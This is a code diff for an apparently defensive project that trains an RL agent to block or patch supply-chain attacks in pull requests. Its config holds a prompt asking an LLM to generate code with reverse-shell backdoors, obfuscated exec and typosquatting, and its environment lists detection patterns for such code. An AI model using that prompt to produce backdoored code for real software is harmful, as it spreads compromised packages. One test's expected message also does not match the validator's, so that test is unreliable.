+ "label": "malicious",
399
+ "source": "mutation_engine",
400
+ "attack_type": "eval_hidden"
401
+ }
402
+ ]
sentinel_synth/data/sdk_config.yaml ADDED
@@ -0,0 +1,33 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Meta Synthetic Data Kit Configuration for Sentinel-Synth
2
+ # This file defines how the SDK should generate synthetic vulnerabilities.
3
+
4
+ vllm:
5
+ api_base: "http://localhost:8000/v1"
6
+ model: "meta-llama/Llama-3.1-8B-Instruct"
7
+
8
+ generation:
9
+ temperature: 0.8
10
+ top_p: 0.95
11
+ max_tokens: 1024
12
+ num_pairs: 5 # Number of examples per ingest chunk
13
+
14
+ prompts:
15
+ # Standard prompt for generating malicious supply-chain code
16
+ code_generation: |
17
+ You are a cybersecurity research assistant specializing in supply-chain security.
18
+ Generate a Python script that contains a subtle, realistic supply-chain vulnerability.
19
+ The vulnerability should be one of:
20
+ - Typosquatting (importing a malicious package similar to a popular one)
21
+ - Obfuscated execution (exec/eval with base64/zlib encoding)
22
+ - Environment hijacking (modifying PATH or other critical env vars)
23
+ - Subprocess backdoors (reverse shells or hidden command execution)
24
+ - Malicious __import__ tricks
25
+
26
+ After the code, provide a 'patch' that fixes the vulnerability without breaking functionality.
27
+ Also, provide a 'unit_test_code' that fails on the malicious version but passes on the patched version.
28
+
29
+ Format the output as a JSON object with keys:
30
+ - code_snippet: the vulnerable code
31
+ - patch: the fixed code
32
+ - unit_test_code: the validation test
33
+ - attack_type: the category of the attack
sentinel_synth/envs/__init__.py ADDED
File without changes
sentinel_synth/envs/sentinel_env.py ADDED
@@ -0,0 +1,175 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import gymnasium as gym
2
+ from gymnasium import spaces
3
+ import json
4
+ import numpy as np
5
+ from pathlib import Path
6
+ import random
7
+
8
+ from ..validation.docker_runner import run_code
9
+ from ..validation.patch_validator import validate_patch
10
+
11
class SentinelEnv(gym.Env):
    """
    Gymnasium environment for Sentinel-Synth.

    Each episode presents one scenario dict (keys used here: ``code_snippet``,
    ``label``, ``type`` and optionally ``patch``).  The agent picks one of five
    discrete actions; ``BLOCK_PR``, ``SUBMIT_PATCH`` and ``REQUEST_REVIEW`` end
    the episode, while ``ANALYZE`` and ``EXECUTE_SANDBOX`` only gather
    information.  An episode is also ended after ``max_steps`` steps.
    """
    metadata = {"render_modes": ["human"]}

    ACTION_ANALYZE = 0
    ACTION_EXECUTE_SANDBOX = 1
    ACTION_BLOCK_PR = 2
    ACTION_SUBMIT_PATCH = 3
    ACTION_REQUEST_REVIEW = 4

    def __init__(self, scenarios_path="sentinel_synth/data/scenarios.json", use_docker=False):
        """
        Args:
            scenarios_path: Path of the JSON file holding the scenario list.
            use_docker: Forwarded to ``run_code`` / ``validate_patch``.
        """
        super().__init__()

        self.use_docker = use_docker
        self.scenarios_path = scenarios_path
        self.scenarios = self._load_scenarios()

        self.current_scenario = None
        self.step_counter = 0
        self.max_steps = 5
        # Created here (not only in reset) so render() works before the first reset().
        self.last_action = None
        self.last_reward = 0

        # Define Observation Space
        # text max length 5000 chars
        self.observation_space = spaces.Dict(
            {
                "code_snippet": spaces.Text(max_length=5000, charset="".join(gym.spaces.text.alphanumeric) + " \n\t\r!@#$%^&*()_+-=[]{}|;':\",.<>/?\\"),
                "static_flags": spaces.Box(low=0, high=1, shape=(5,), dtype=np.int32),
                "risk_score": spaces.Box(low=0.0, high=1.0, shape=(1,), dtype=np.float32),
            }
        )

        # Define Action Space
        self.action_space = spaces.Discrete(5)

    def _load_scenarios(self):
        """Return the parsed scenario file, or ``[]`` (with a warning) if it cannot be read."""
        try:
            # JSON is UTF-8 by specification; do not depend on the platform default encoding.
            with open(self.scenarios_path, "r", encoding="utf-8") as f:
                return json.load(f)
        except (OSError, ValueError) as e:
            # OSError: missing/unreadable file. ValueError: invalid JSON or bad encoding.
            print(f"Warning: Could not load scenarios from {self.scenarios_path}: {e}")
            return []

    def _compute_static_flags(self, code_snippet: str):
        """
        Return five 0/1 substring indicators for ``code_snippet``.

        Index meaning: 0 eval/exec, 1 subprocess/os.system, 2 socket/requests,
        3 os.environ, 4 base64/zlib.
        """
        flags = np.zeros(5, dtype=np.int32)

        if "eval(" in code_snippet or "exec(" in code_snippet:
            flags[0] = 1
        if "subprocess" in code_snippet or "os.system" in code_snippet:
            flags[1] = 1
        if "socket" in code_snippet or "requests" in code_snippet:
            flags[2] = 1
        if "os.environ" in code_snippet:
            flags[3] = 1
        if "base64" in code_snippet or "zlib" in code_snippet:
            flags[4] = 1

        return flags

    def _get_obs(self):
        """Build the observation dict for the current scenario."""
        code = self.current_scenario["code_snippet"]
        # truncate code to 5000 chars to fit text space
        if len(code) > 5000:
            code = code[:5000]

        flags = self._compute_static_flags(code)
        # Risk score is simply the fraction of static flags that fired.
        risk_score = np.array([np.sum(flags) / 5.0], dtype=np.float32)

        return {
            "code_snippet": code,
            "static_flags": flags,
            "risk_score": risk_score
        }

    def reset(self, seed=None, options=None):
        """
        Start a new episode.

        Args:
            seed: Seeds ``self.np_random``, which drives scenario sampling.
            options: Optional dict; ``options["scenario"]`` pins the scenario.

        Returns:
            ``(observation, info)`` with an empty ``info`` dict.
        """
        super().reset(seed=seed)

        # We can optionally pass a specific scenario via options
        if options and "scenario" in options:
            self.current_scenario = options["scenario"]
        elif self.scenarios:
            # Sample with the environment's own seeded generator so that
            # reset(seed=...) actually makes the episode reproducible.
            index = int(self.np_random.integers(len(self.scenarios)))
            self.current_scenario = self.scenarios[index]
        else:
            # Fallback if no scenarios to prevent crash
            self.current_scenario = {
                "id": "fallback", "type": "functional", "label": "benign",
                "code_snippet": "print('hello')", "patch": None
            }

        self.step_counter = 0
        self.last_action = None
        self.last_reward = 0

        return self._get_obs(), {}

    def step(self, action):
        """
        Apply ``action`` to the current scenario.

        Returns:
            ``(observation, reward, done, False, info)``.  The fourth element
            (truncated) is always ``False``; hitting ``max_steps`` is reported
            through ``done`` together with a 0.5 reward penalty.
        """
        self.step_counter += 1

        reward = 0
        done = False
        info = {}

        self.last_action = action

        if action == self.ACTION_ANALYZE:
            # Small exploration reward for analyzing
            reward = 0.05
            info = {"analysis": "Static analysis reveals potential injection points if untrusted input is passed."}

        elif action == self.ACTION_EXECUTE_SANDBOX:
            # Execute code snippet
            result = run_code(self.current_scenario["code_snippet"], timeout_sec=3, use_docker=self.use_docker)
            info = {"telemetry": result}
            # Shaped reward for gathering info
            reward = 0.1

        elif action == self.ACTION_BLOCK_PR:
            if self.current_scenario["label"] == "malicious":
                reward = 1.5  # Correctly blocked
            else:
                reward = -2.0  # False positive block
            done = True

        elif action == self.ACTION_SUBMIT_PATCH:
            scenario_patch = self.current_scenario.get("patch")
            if not scenario_patch:
                if self.current_scenario["label"] == "benign":
                    # Benign code doesn't need a patch, but submitting one is a mistake
                    reward = -1.0
                else:
                    # Should have a patch for malicious, but it's missing in scenario?
                    reward = -0.5
            else:
                success, msg, details = validate_patch(self.current_scenario, scenario_patch, use_docker=self.use_docker)
                info = {"validation_success": success, "msg": msg, "details": details}

                if success:
                    if self.current_scenario["label"] == "malicious":
                        reward = 4.0  # High reward for fixing vulnerability
                    else:
                        reward = -2.5  # High penalty for breaking benign code
                else:
                    reward = -1.5  # Patch failed validation
            done = True

        elif action == self.ACTION_REQUEST_REVIEW:
            if self.current_scenario["type"] == "false_positive":
                reward = 0.5  # Good choice for ambiguous cases
            else:
                reward = 0.0
            done = True
            info = {"review_requested": True}

        # Check max steps
        if self.step_counter >= self.max_steps and not done:
            reward -= 0.5  # Penalty for timeout
            done = True

        self.last_reward = reward
        return self._get_obs(), reward, done, False, info

    def render(self):
        """Print the step counter together with the most recent action and reward."""
        print(f"Step: {self.step_counter} | Action: {self.last_action} | Reward: {self.last_reward}")
sentinel_synth/tests/__init__.py ADDED
File without changes
sentinel_synth/tests/test_validator.py ADDED
@@ -0,0 +1,57 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import pytest
2
+ from sentinel_synth.validation.patch_validator import validate_patch
3
+
4
def test_syntax_error_detected():
    """A patch that does not parse is rejected with the "Syntax error" message."""
    broken_patch = "print('hello"  # Missing closing quote
    base_scenario = {
        "type": "functional",
        "code_snippet": "print('hello')",
        "unit_test_code": None,
    }

    ok, message, extra = validate_patch(base_scenario, broken_patch, use_docker=False)

    assert ok is False
    assert message == "Syntax error"
    assert "error" in extra
13
+
14
def test_unit_test_pass():
    """A patch that keeps ``add`` correct is accepted as valid."""
    unit_test = "import code\nassert code.add(1, 2) == 3\n"
    original_code = "def add(a, b): return a + b"
    reformatted_patch = "def add(a, b):\n    return a + b\n"

    base_scenario = {
        "type": "functional",
        "code_snippet": original_code,
        "unit_test_code": unit_test,
    }

    ok, message, _extra = validate_patch(base_scenario, reformatted_patch, use_docker=False)

    assert ok is True
    assert message == "Patch is valid"
26
+
27
def test_unit_test_fail():
    """A patch that breaks ``add`` is rejected because the unit test fails."""
    unit_test = "import code\nassert code.add(1, 2) == 3\n"
    original_code = "def add(a, b): return a + b"
    # Breaking the functionality in the patch
    breaking_patch = "def add(a, b):\n    return a - b\n"

    base_scenario = {
        "type": "functional",
        "code_snippet": original_code,
        "unit_test_code": unit_test,
    }

    ok, message, extra = validate_patch(base_scenario, breaking_patch, use_docker=False)

    assert ok is False
    assert message == "Unit test failed"
    assert "test_output" in extra
41
+
42
def test_vulnerability_remains():
    """A patch that leaves the injected statement in place is rejected."""
    unit_test = "import code\nassert code.add(1, 2) == 3\n"
    # Attack injects a hidden print which simulates a backdoor
    infected_code = "print('Hello from hidden exec!')\ndef add(a, b): return a + b"
    # Patch fails to remove the backdoor, only formats the code
    cosmetic_patch = "print('Hello from hidden exec!')\ndef add(a, b):\n    return a + b\n"

    attack_scenario = {
        "type": "true_positive",
        "attack_type": "obfuscated_exec",
        "code_snippet": infected_code,
        "unit_test_code": unit_test,
    }

    ok, message, extra = validate_patch(attack_scenario, cosmetic_patch, use_docker=False)

    assert ok is False
    assert message == "Vulnerability remains"
    assert "evidence" in extra
sentinel_synth/training/__init__.py ADDED
File without changes
sentinel_synth/training/train_grpo.py ADDED
@@ -0,0 +1,187 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import argparse
3
+ import numpy as np
4
+
5
+ try:
6
+ import wandb
7
+ except ImportError:
8
+ wandb = None
9
+
10
+ # In a real environment, we would also import:
11
+ # from unsloth import FastLanguageModel
12
+ # from trl import GRPOTrainer, GRPOConfig
13
+ # But for the hackathon prototype and safe execution without massive deps,
14
+ # we use mock classes in dry-run mode if the real ones aren't available.
15
+
16
+ from ..envs.sentinel_env import SentinelEnv
17
+
18
def train_agent(args):
    """
    Main training loop for Sentinel-Synth GRPO.

    With ``args.dry_run`` set, a deterministic dummy policy is rolled out in
    ``SentinelEnv`` and mock group-relative advantages are printed.  Otherwise
    a LoRA adapter for Qwen2.5-Coder-7B is trained with unsloth + trl, using
    single-step environment rewards.

    Args:
        args: Parsed CLI namespace.  Reads ``dry_run``, ``use_docker``,
            ``group_size``, ``learning_rate`` and ``max_seq_len``;
            ``max_steps`` and ``gradient_accumulation_steps`` are optional
            and fall back to defaults when the namespace lacks them.
    """
    # 1. Setup WandB
    # wandb is an optional import at module level and may be None.
    use_wandb = not args.dry_run and wandb is not None
    if args.dry_run:
        print("[DRY RUN] WandB initialization skipped.")
    elif use_wandb:
        wandb.init(project="sentinel-synth", name="grpo-qwen2.5-coder-7b", config=vars(args))
    else:
        print("Warning: wandb is not installed; experiment tracking is disabled.")

    # 2. Load Environment
    env = SentinelEnv(use_docker=args.use_docker)
    print(f"Loaded environment with {len(env.scenarios)} scenarios.")

    # 3. Load Model (Mock or unsloth)
    if args.dry_run:
        print("[DRY RUN] Loading dummy model instead of Qwen2.5-Coder-7B in 4-bit...")

        def dummy_policy(obs):
            # Deterministic dummy policy for dry runs
            risk = obs["risk_score"][0]
            if risk > 0.5:
                return 3  # ACTION_SUBMIT_PATCH
            return 0  # ACTION_ANALYZE

        # 4. Dummy Training Loop
        epochs = 3
        batch_size = 4

        for epoch in range(epochs):
            print(f"--- Epoch {epoch+1}/{epochs} ---")
            total_rewards = []

            for batch_idx in range(len(env.scenarios) // batch_size):
                trajectories = []
                for _ in range(args.group_size):
                    obs, _info = env.reset()
                    done = False
                    trajectory_reward = 0
                    steps = 0

                    while not done and steps < env.max_steps:
                        action = dummy_policy(obs)
                        obs, reward, done, _truncated, _info = env.step(action)
                        trajectory_reward += reward
                        steps += 1

                    trajectories.append(trajectory_reward)

                # Mock GRPO Advantage calculation
                mean_reward = np.mean(trajectories)
                std_reward = np.std(trajectories) + 1e-8
                advantages = [(r - mean_reward) / std_reward for r in trajectories]

                total_rewards.append(mean_reward)
                print(f"Batch {batch_idx}: Mean Reward: {mean_reward:.2f}, Advantages: {[f'{a:.2f}' for a in advantages]}")

            if total_rewards:
                print(f"Epoch {epoch+1} Mean Reward: {np.mean(total_rewards):.2f}")
            else:
                # Avoid np.mean([]) (NaN plus a RuntimeWarning) when no batch ran.
                print(f"Epoch {epoch+1}: no batches run (fewer than {batch_size} scenarios loaded).")

        print("[DRY RUN] Training complete. Saved dummy adapter to ./grpo_lora/")
        return

    print("Initializing true GRPO training with trl and unsloth...")
    # Only the imports are guarded: an ImportError raised later, during
    # training itself, should surface instead of being reported as "skipped".
    try:
        from unsloth import FastLanguageModel
        from trl import GRPOTrainer, GRPOConfig
        from datasets import Dataset
    except ImportError as e:
        print(f"Skipping standard training fallback. Missing required dependency: {e}")
        return

    import re

    max_seq_length = args.max_seq_len
    model, tokenizer = FastLanguageModel.from_pretrained(
        model_name="unsloth/Qwen2.5-Coder-7B-Instruct",
        max_seq_length=max_seq_length,
        load_in_4bit=True,
    )

    model = FastLanguageModel.get_peft_model(
        model,
        r=16,
        target_modules=["q_proj", "k_proj", "v_proj", "o_proj",
                        "gate_proj", "up_proj", "down_proj"],
        lora_alpha=16,
        lora_dropout=0,
        bias="none",
        use_gradient_checkpointing="unsloth",
        random_state=3407,
    )

    # We need a proper dataset of prompts
    prompt_data = [{"prompt": f"Analyze this Python code for supply-chain vulnerabilities.\n<code_snippet>\n{s['code_snippet']}\n</code_snippet>\nYour response MUST include a thought process in <thought> tags and a final action (0-4) in <action> tags.\n0: ANALYZE, 1: EXECUTE_SANDBOX, 2: BLOCK_PR, 3: SUBMIT_PATCH, 4: REQUEST_REVIEW."} for s in env.scenarios]
    dataset = Dataset.from_list(prompt_data)

    # Exact prompt -> scenario lookup.  Matching on a 100-character prefix is
    # ambiguous because many scenarios share the same injected preamble.
    scenario_by_prompt = {}
    for row, scenario in zip(prompt_data, env.scenarios):
        scenario_by_prompt.setdefault(row["prompt"], scenario)

    def _as_text(item):
        """Return plain text for a string or a chat-style list of message dicts."""
        if isinstance(item, str):
            return item
        return "".join(message.get("content", "") for message in item)

    def env_reward_function(completions, prompts, **kwargs):
        """
        Extracts chosen action, runs env, returns reward array.
        Matches completions to their corresponding scenario from prompts.
        """
        rewards = []
        for prompt, completion in zip(prompts, completions):
            # extract the action from the completion using regex
            text = _as_text(completion)
            action = SentinelEnv.ACTION_ANALYZE
            match = re.search(r"<action>(\d+)</action>", text)
            if match:
                try:
                    action = int(match.group(1))
                except ValueError:
                    # e.g. a digit run longer than int() is allowed to parse
                    action = SentinelEnv.ACTION_ANALYZE

            target_scenario = scenario_by_prompt.get(_as_text(prompt))
            if target_scenario is None:
                rewards.append(0.0)
                continue

            # Reset env with this specific scenario
            env.reset(options={"scenario": target_scenario})
            _, reward, _, _, _ = env.step(action)
            rewards.append(float(reward))
        return rewards

    training_args = GRPOConfig(
        output_dir="grpo_lora",
        learning_rate=args.learning_rate,
        per_device_train_batch_size=1,
        # Older argument namespaces may not define these two; fall back to
        # the group size and to "no step limit" respectively.
        gradient_accumulation_steps=getattr(args, "gradient_accumulation_steps", args.group_size),
        max_prompt_length=args.max_seq_len // 2,
        max_completion_length=args.max_seq_len // 2,
        num_generations=args.group_size,
        max_steps=getattr(args, "max_steps", -1),
        save_steps=50,
        logging_steps=10,
        report_to="wandb" if use_wandb else "none",
    )

    trainer = GRPOTrainer(
        model=model,
        reward_funcs=[env_reward_function],
        args=training_args,
        train_dataset=dataset,
    )

    trainer.train()
    model.save_pretrained_merged("grpo_lora", tokenizer, save_method="lora")
    print("Training complete and adapter saved.")
177
+
178
if __name__ == "__main__":
    # Command-line entry point: every attribute train_agent reads from the
    # namespace must be declared here.
    parser = argparse.ArgumentParser(description="Train the Sentinel-Synth agent with GRPO.")
    parser.add_argument("--dry-run", action="store_true", help="Run with mock components without GPU.")
    parser.add_argument("--use-docker", action="store_true", help="Use Docker for execution fallback in env.")
    parser.add_argument("--learning-rate", type=float, default=1e-6)
    parser.add_argument("--group-size", type=int, default=4)
    parser.add_argument("--max-seq-len", type=int, default=1024)
    # train_agent reads these two when building the GRPO config; without them
    # a real (non dry-run) training run fails with AttributeError.
    parser.add_argument("--gradient-accumulation-steps", type=int, default=4,
                        help="Gradient accumulation steps passed to the GRPO config.")
    parser.add_argument("--max-steps", type=int, default=-1,
                        help="Maximum number of training steps (-1 for no explicit limit).")

    args = parser.parse_args()
    train_agent(args)
sentinel_synth/validation/__init__.py ADDED
File without changes
sentinel_synth/validation/docker_runner.py ADDED
@@ -0,0 +1,107 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
import os
import shutil
import subprocess
import sys
import tempfile
5
+
6
+ # To support --no-docker or environments where docker isn't running yet.
7
def run_code(code: str, timeout_sec: int = 5, use_docker: bool = True) -> dict:
    """
    Execute Python code in a throwaway sandbox directory and report telemetry.

    If use_docker is True, the script runs in `sentinel-sandbox:latest` with
    networking disabled and CPU/memory limits applied.
    If False, it runs on the host with the current interpreter (UNSAFE for
    real workloads, but fine for demo/dev).

    Args:
        code: Python source to execute.
        timeout_sec: Wall-clock limit for the run, in seconds.
        use_docker: Run inside the Docker sandbox instead of on the host.

    Returns:
        A dict with the keys:
          - "stdout" / "stderr": captured output ("stderr" holds a short
            message on timeout or launch failure).
          - "exit_code": process return code, or -1 if it never finished.
          - "network_blocked": True only for Docker runs (`--network none`).
          - "file_writes": sorted names of entries created in the sandbox
            directory, other than the script itself.
    """
    result = {
        "stdout": "",
        "stderr": "",
        "exit_code": -1,
        "network_blocked": use_docker,
        "file_writes": []
    }

    temp_dir = tempfile.mkdtemp(prefix="sentinel_sandbox_")
    # mkdtemp names only use [a-z0-9_], so the directory name doubles as a
    # unique, valid container name we can address if the run has to be killed.
    container_name = os.path.basename(temp_dir)

    try:
        script_path = os.path.join(temp_dir, "script.py")
        # Python source is UTF-8 by default; do not depend on the host locale.
        with open(script_path, "w", encoding="utf-8") as f:
            f.write(code)

        if use_docker:
            # We assume docker CLI is available.
            cmd = [
                "docker", "run", "--rm",
                "--name", container_name,
                "--network", "none",
                "--memory", "256m",
                "--cpus", "0.5",
                "-v", f"{temp_dir}:/app",
                # Relative-path writes must land in the mounted directory,
                # otherwise they are invisible to the file_writes check.
                "-w", "/app",
                "sentinel-sandbox:latest",
                "python", "/app/script.py",
            ]
        else:
            # Local fallback (UNSAFE but necessary if Docker is unavailable).
            # Use the interpreter running this process so the same environment
            # is used and we do not depend on a `python3` binary on PATH.
            cmd = [sys.executable or "python3", script_path]

        process = subprocess.run(
            cmd,
            capture_output=True,
            text=True,
            timeout=timeout_sec,
            # Same reason as `-w /app`: keep relative writes inside the sandbox.
            cwd=temp_dir,
        )

        result["stdout"] = process.stdout
        result["stderr"] = process.stderr
        result["exit_code"] = process.returncode

    except subprocess.TimeoutExpired as e:
        result["stderr"] = "Execution timed out."
        if e.stdout:
            # Partial output may arrive as bytes even when text=True was used.
            result["stdout"] = (
                e.stdout.decode("utf-8", errors="ignore")
                if isinstance(e.stdout, bytes)
                else e.stdout
            )
        if use_docker:
            # The timeout only kills the docker CLI client; the container
            # itself keeps running unless it is stopped explicitly.
            try:
                subprocess.run(
                    ["docker", "kill", container_name],
                    capture_output=True,
                    timeout=10,
                )
            except (OSError, subprocess.SubprocessError):
                # Best effort: the container may already be gone.
                pass

    except Exception as e:
        result["stderr"] = f"Execution error: {str(e)}"

    finally:
        # Record new files even when the run timed out or failed, so a script
        # that drops a file and then hangs is still reported.
        try:
            result["file_writes"] = sorted(
                name for name in os.listdir(temp_dir) if name != "script.py"
            )
        except OSError:
            pass
        shutil.rmtree(temp_dir, ignore_errors=True)

    return result
72
+
73
def check_syntax(code: str, use_docker: bool = True) -> tuple[bool, str]:
    """
    Check the Python syntax of the code without executing it.

    The code is written to a temporary script and byte-compiled with
    `python -m py_compile`, either inside `sentinel-sandbox:latest` or with
    the current interpreter on the host.

    Args:
        code: Python source to check.
        use_docker: Compile inside the Docker sandbox instead of on the host.

    Returns:
        (True, "") when the code compiles, otherwise (False, message) where
        message is the compiler's stderr or a short failure description.
    """
    temp_dir = tempfile.mkdtemp(prefix="sentinel_syntax_")
    # mkdtemp names only use [a-z0-9_], so the directory name doubles as a
    # unique, valid container name we can address if the run has to be killed.
    container_name = os.path.basename(temp_dir)

    try:
        script_path = os.path.join(temp_dir, "script.py")
        # Python source is UTF-8 by default; do not depend on the host locale.
        with open(script_path, "w", encoding="utf-8") as f:
            f.write(code)

        if use_docker:
            cmd = [
                "docker", "run", "--rm",
                "--name", container_name,
                # Compiling needs no network; keep the sandbox closed.
                "--network", "none",
                "-v", f"{temp_dir}:/app",
                "sentinel-sandbox:latest",
                "python", "-m", "py_compile", "/app/script.py",
            ]
        else:
            # Use the interpreter running this process rather than whatever
            # `python3` happens to be on PATH.
            cmd = [sys.executable or "python3", "-m", "py_compile", script_path]

        process = subprocess.run(
            cmd,
            capture_output=True,
            text=True,
            timeout=5
        )
        if process.returncode == 0:
            return True, ""
        return False, process.stderr
    except subprocess.TimeoutExpired:
        if use_docker:
            # The timeout only kills the docker CLI client; stop the container
            # explicitly so it does not linger.
            try:
                subprocess.run(
                    ["docker", "kill", container_name],
                    capture_output=True,
                    timeout=10,
                )
            except (OSError, subprocess.SubprocessError):
                # Best effort: the container may already be gone.
                pass
        return False, "Syntax check timed out"
    except Exception as e:
        return False, f"Syntax check failed: {e}"
    finally:
        shutil.rmtree(temp_dir, ignore_errors=True)
sentinel_synth/validation/patch_validator.py ADDED
@@ -0,0 +1,87 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ import tempfile
3
+ import textwrap
4
+ from .docker_runner import run_code, check_syntax
5
+
6
# Substrings that typically show up in stderr when sandboxed code tried to use
# the network and was refused. Heuristic only: code that swallows its own
# exceptions leaves no trace here.
_NETWORK_ERROR_MARKERS = (
    "gaierror",
    "URLError",
    "ConnectionError",
    "ConnectionRefusedError",
    "Network is unreachable",
    "Temporary failure in name resolution",
    "Name or service not known",
)


def _network_attempted(telemetry: dict) -> bool:
    """Return True if a network-blocked run shows signs of a refused network call."""
    if not telemetry.get("network_blocked"):
        return False
    stderr = telemetry.get("stderr") or ""
    return any(marker in stderr for marker in _NETWORK_ERROR_MARKERS)


def _build_test_script(patch_code: str, unit_test_code: str) -> str:
    """Build a single-file runner that exposes the patch as module 'code' and runs the test."""
    return "\n".join([
        "import sys",
        "import types",
        "",
        "# Create a mock 'code' module",
        "module = types.ModuleType('code')",
        # repr() yields a correctly escaped literal, so quotes or backslashes
        # in the patch can neither corrupt nor break out of the string.
        f"exec({patch_code!r}, module.__dict__)",
        "sys.modules['code'] = module",
        "",
        "# Run the unit test",
        unit_test_code,
        'print("TEST_SUCCESS")',
        "",
    ])


def validate_patch(scenario: dict, patch_code: str, use_docker: bool = True) -> tuple[bool, str, dict]:
    """
    Validates a patch using a 3-step pipeline:
    1. Syntax Check
    2. Unit Test Execution
    3. Re-attack (Vulnerability Verification)

    Args:
        scenario: Scenario record. Reads "unit_test_code" (optional), "type",
            "attack_type" and, for true positives, "code_snippet".
        patch_code: Candidate patched source code.
        use_docker: Forwarded to the sandbox runner.

    Returns: (success, message, details_dict)
        details_dict carries "error", "test_output" or "evidence" on failure
        and "validation_log" on success.
    """
    details = {}

    # 1. Syntax Check
    is_valid, err_msg = check_syntax(patch_code, use_docker=use_docker)
    if not is_valid:
        details["error"] = err_msg
        return False, "Syntax error", details

    # 2. Unit Test Execution
    unit_test_code = scenario.get("unit_test_code")
    if unit_test_code:
        # The test does something like "import code; assert code.func() == expected".
        # The runner executes one script, so the patch is injected as an
        # in-memory module named 'code' ahead of the test body.
        combined_script = _build_test_script(patch_code, unit_test_code)

        result = run_code(combined_script, timeout_sec=5, use_docker=use_docker)
        if result["exit_code"] != 0 or "TEST_SUCCESS" not in result["stdout"]:
            details["test_output"] = result["stderr"] if result["stderr"] else result["stdout"]
            return False, "Unit test failed", details

    # 3. Re-attack (Vulnerability Verification)
    if scenario.get("type") == "true_positive" and scenario.get("attack_type"):
        # Run original code snippet to get baseline malicious behavior
        attack_result = run_code(scenario["code_snippet"], timeout_sec=5, use_docker=use_docker)

        # Run patched code
        patch_result = run_code(patch_code, timeout_sec=5, use_docker=use_docker)

        vulnerability_remains = False

        # Generic heuristic: Did the patch reduce suspicious side-effects?
        # 1. Compare file writes (malicious code often creates/modifies files):
        #    flag when the attack wrote files and the patch writes as many or more.
        attack_writes = attack_result.get("file_writes", [])
        patch_writes = patch_result.get("file_writes", [])
        if attack_writes and len(patch_writes) >= len(attack_writes):
            vulnerability_remains = True

        # 2. Compare network attempts. "network_blocked" only says the sandbox
        #    had no network (it mirrors use_docker), so it cannot be used as
        #    evidence by itself -- doing so rejects every patch under Docker.
        #    Look for refused-connection traces in both runs instead.
        if _network_attempted(attack_result) and _network_attempted(patch_result):
            vulnerability_remains = True

        # 3. Specific attack type checks (refined)
        patch_stderr = patch_result.get("stderr") or ""
        if scenario["attack_type"] == "typosquatting":
            # A missing module is reported as ModuleNotFoundError (a subclass
            # of ImportError), so accept either name in the traceback.
            import_failed = "ImportError" in patch_stderr or "ModuleNotFoundError" in patch_stderr
            if import_failed and "pythonn" in patch_stderr:
                vulnerability_remains = True
        elif scenario["attack_type"] == "obfuscated_exec":
            # If the patch still produces the same specific output as the obfuscated one
            if attack_result["stdout"].strip() != "" and patch_result["stdout"] == attack_result["stdout"]:
                vulnerability_remains = True

        if vulnerability_remains:
            details["evidence"] = {
                "attack_telemetry": attack_result,
                "patch_telemetry": patch_result
            }
            return False, "Vulnerability still accessible", details

    details["validation_log"] = "All checks passed successfully."
    return True, "Patch is valid", details
setup.py ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ from setuptools import setup, find_packages
2
+
3
# Package metadata for sentinel_synth.
setup(
    name="sentinel_synth",
    version="0.1.0",
    packages=find_packages(),
    # The package uses built-in generic annotations such as tuple[bool, str],
    # which require Python 3.9 or newer.
    python_requires=">=3.9",
    install_requires=[
        "gymnasium>=0.29.0",
        "docker>=7.0.0",
        "streamlit>=1.30.0",
        "wandb>=0.16.0",
        "pytest>=8.0.0",
        "synthetic-data-kit>=0.1.0",
    ],
)